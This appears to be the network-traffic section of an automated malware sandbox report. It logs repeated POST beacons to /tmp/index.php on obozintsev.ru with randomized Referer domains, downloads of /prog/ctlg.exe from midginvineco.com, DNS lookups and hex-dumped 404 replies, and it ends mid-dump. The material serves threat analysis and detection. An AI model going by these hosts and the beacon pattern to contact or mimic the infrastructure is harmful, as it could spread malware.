              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://indpkapnwuhe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wdrrntcgtbyvfp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ehvxkgepwxtygl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tejbjmlbuatgr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://otfwaojfoxegoc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kqylhpxweftfa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fgrdwevlbrdtr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://natewkewlwih.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fhaalrvyqueiyk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ujchxvegkeooch.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pkapxutderw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dqdghghmtaygindm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ievirvwtsxbiyvql.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cdwxnwopeyrbni.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fgbhvviibbt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://miptxmfamtohobtx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jwqwkqwentbhrv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rtjqjvueogqtxkos.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ghrwspfuixcrwvx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qyqahwjnqtjwf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jjaaaitryycjvb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 284Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://reqhcetbeojgkny.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nsgtchrbqowj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kjjcaejlhnascj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ansopymmtehxip.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wyqtmqrstxfymqsq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ngsmolqmjlkr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xwimesajyti.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qasfskgmelreo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xgfnddjygdt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 191Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ciuapvhjnqxsxxwr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://egomlfgoxoteaymh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ewsvhrknjfqh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uqjegtiiabqrm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mdwlauviipmapdo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pjedtjbwdoay.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://buqwtxgqsqkupxr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lxgihqdoncikbgg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pktfnvaxqpxmxps.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 232Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gsuntxougdhs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://unxnurhhgcwb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cvixokerumeto.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 158Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fsnaumbblcik.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uwalktmlxvraf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://omlavaayevr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iopuyoenyjytdheg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xajywliqqhjs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cjnppqrvkvd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: obozintsev.ru
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /prog/ctlg.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: midginvineco.com
              Source: global trafficHTTP traffic detected: GET /prog/ctlg.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: midginvineco.com
              Source: global trafficDNS traffic detected: DNS query: obozintsev.ru
              Source: global trafficDNS traffic detected: DNS query: midginvineco.com
              Source: global trafficDNS traffic detected: DNS query: jamforvaise.com
              Source: global trafficDNS traffic detected: DNS query: telphboardline.com
              Source: unknownHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://klvjvwlocecf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: obozintsev.ru
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:12:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 81 ed Data Ascii: r
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:12:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:12:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:12:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:12:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:12:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:12:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 